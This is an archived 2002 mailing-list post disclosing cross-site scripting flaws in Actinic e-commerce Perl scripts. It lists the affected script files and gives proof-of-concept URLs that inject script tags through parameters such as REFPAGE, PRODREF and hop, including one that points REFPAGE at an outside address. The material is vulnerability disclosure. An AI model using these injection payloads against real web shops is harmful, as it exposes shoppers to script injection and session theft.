Holes in Actinic E-commerce services.

From: Frog Man (leseulfrogat_private)
Date: Wed Feb 06 2002 - 07:00:27 PST

Next message: Russell Handorf: "Re: chaging your @home IP address... could you take a bunch ofthem....probably... could you get something from it...maybe"

Previous message: Ed Moyle: "RE: Encryption Algorithm Footprint"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

http://www.actinic.com
http://www.actinic.co.uk/
http://www.actinic-europe.com/
Versions :
4.7.0 & -


With the files :
bb|000|001|.pl
ca|   |002|
os|   |003|
sh|   |004|
ss|   |005|
  |   |006|
  |   |007|
  |   |009|
  |   |010|
  |   |011|
  |   |012|
  |   |020|
  |   |036|
  |   |045|
  |   |046|
  |   |137|
  |   |143|
  |   |410|
referrer.pl

**000***.pl?<script>alert('CSS')</script>


and :

/ca000007.pl?ACTION=SHOWCART&REFPAGE=">[ ANYSCRIPT ]
/ss000007.pl?PRODREF=<--SCRIPT-->
/ca000001.pl?ACTION=SHOWCART&hop="><script>alert('HoP!')</script>&PATH=acatalog%2f
http://www.host.com/ss000007.pl?REFPAGE=http%3A%2F%2Fwere.to.go&PREVQUERY=ACTION%3DSHOWCART&SS=yiiiihaaaaa&PR=-1&TB=A&SHOP=


More details in french :
http://www.bal-team.t2u.com/Tuts/actinic.txt

frog-m@n



_________________________________________________________________
Discutez en ligne avec vos amis, essayez MSN Messenger : 
http://messenger.msn.fr/

Next message: Russell Handorf: "Re: chaging your @home IP address... could you take a bunch ofthem....probably... could you get something from it...maybe"
Previous message: Ed Moyle: "RE: Encryption Algorithm Footprint"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Feb 06 2002 - 10:39:50 PST